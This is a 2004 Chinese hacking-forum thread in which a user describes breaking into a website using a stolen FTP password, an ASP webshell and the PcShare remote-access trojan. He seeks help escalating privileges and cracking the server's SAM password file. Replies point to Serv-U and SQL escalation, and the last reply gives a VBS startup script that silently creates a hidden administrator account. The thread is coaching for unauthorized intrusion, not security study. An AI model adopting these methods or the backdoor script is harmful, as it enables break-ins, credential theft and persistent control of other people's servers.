论坛: 黑客进阶 标题: 关于“海阳顶端木马”入侵 复制本贴地址    
作者: 神智不侵了 [telnet3389]    论坛用户   登录
一不小心,得到了一个网站的FTP口令,上传了一个海阳顶端到上面,然后用它上传了PcShare服务端到c盘下面,运行成功,但是权限不够。ASP木马用的是User的权限,不能添加用户也不能写入自动运行到注册表,而且服务端能连上我的机器但是不能控制它,也得不到用户的密码。大家看看能不能有其他的办法提升权限的吗?

听说用getadmin.exe 可以,但是找了好长时间还是没有搜索到,现在的 Baidu和Google 里面好多站点都是骗人的,看了很多的下载站点,不是打不开就是下载的时候“无法找到该页”,或“该页无法显示”,郁闷!小凤居不知道有没有。在此的各位如果有的话,发一个给我,或者是告诉我地址也行。谢谢了。

还有其他可行方法吗?(修改主页没有多大的意思,只是要提升权限,有了Administator的权限就无所不能了,呵呵,当然有了Administrator的权限还是不能把那机器搬回家来的^-^  :)  相信这样的情况大家都遇到过吧,希望大家都能来讨论一下

地主 发表时间: 04-07-31 20:36

回复: 云边月 [agl]   论坛用户   登录
我说这样的问题您能不能去菜鸟乐园问去?

这儿谁会回答你呀?

那些网站不是骗人,而是你要的那个程序老的没人要了。

B1层 发表时间: 04-07-31 22:09

回复: 神智不侵了 [telnet3389]   论坛用户   登录
真的是老得没有人要了吗?
可是还是选入了黑客必备的工具包里了的。
我想会有用的。
有更好的方法得提升权限?

B2层 发表时间: 04-07-31 23:48

回复: 神智不侵了 [telnet3389]   论坛用户   登录
大家来看看嘛

B3层 发表时间: 04-08-12 20:58

回复: 斯文败类 [lijingxi]   见习版主   登录
你上传的ASP木马权限已经很高了!
PcShare 能自动上线  不能控制我想和权限应该没有太大的关系!
应该是对方有防火墙拦截!所以不能达到远程控制的目的!

提升权限你可以在SERV-U上想办法!
或者SQL 上想办法!!
比如 SERV-U SQL的扩展命令

B4层 发表时间: 04-08-13 08:53

回复: bluecat_ [bluecat_]   论坛用户   登录
老木马和老的病毒好像现在最新的杀毒软件都杀不了呀....

B5层 发表时间: 04-08-16 00:36

回复: 神智不侵了 [telnet3389]   论坛用户   登录
这个服务器我用asp木马运行 黑洞 成功了,但只能查看机器里面的文件,不能下载和上传
pcshare没有成功
winshell连接成功,但是没有权限,没有办法加帐号
大家说能不能用asp木马copy它的sam到ftp目录,再下载到本地,在破解?
我试了,可以下载repair下面的那个sam,但是不能下载config下面的那个
可以repair下的那个好象没有什么用的,大小都是20k,不信你看看自己的那个。
现在就是为提升权限伤脑筋,在asp下的木马没有什么权限
它用的是MS的ftp,Serv-U益处行不通

B6层 发表时间: 04-09-19 13:14

回复: 孤竹 [guzhu]   论坛用户   登录
http://www.20cn.net/cgi-bin/club/show.pl?key=nbEhNRukhfou&cat=security&forum=newbie&id=1094973401&page=1

B7层 发表时间: 04-09-19 14:29

回复: 孤竹 [guzhu]   论坛用户   登录
我记得repair下的sam也是纪录同种东西的!

B8层 发表时间: 04-09-19 14:31

回复: 狼行天涯 [yuwy]   论坛用户   登录
看来看去不东
还是看了看来


B9层 发表时间: 04-09-22 16:41

回复: 神智不侵了 [telnet3389]   论坛用户   登录
回复: 孤竹 [guzhu]    论坛用户 回复  收藏  http://www.20cn.net/cgi-bin/club/show.pl?key=nbEhNRukhfou&cat=security&forum=newbie&id=1094973401&page=1


感谢 孤竹 兄弟,你发的贴我看了,里面有些方法是可行的
谢了

repair下的那个sam好象没有多大的用,我copy下来了但是用LC破不开

我在我的机器上面建了一个空口令的管理员帐号,然后再用LC破解那个repair下的sam也同样不行,绝对不是我不会用LC.这是为什么呢?那个repair下的sam好象是备用的吧,所以与当前的管理员帐号密码不一样.
config下的那个sam在机器正常工作下又是无法Copy过来破解,能有什么方法那到config下的那个sam ?

B10层 发表时间: 04-09-23 09:56

回复: tiancaiyt [tiancaiyt]   论坛用户   登录
写个vbs文件 放到启动组
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user tiancaiyt xxxx /add",0)
b=wshshell.run ("cmd.exe /c net localgroup administrators tiancaiyt /add",0)

B11层 发表时间: 04-09-23 21:42

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号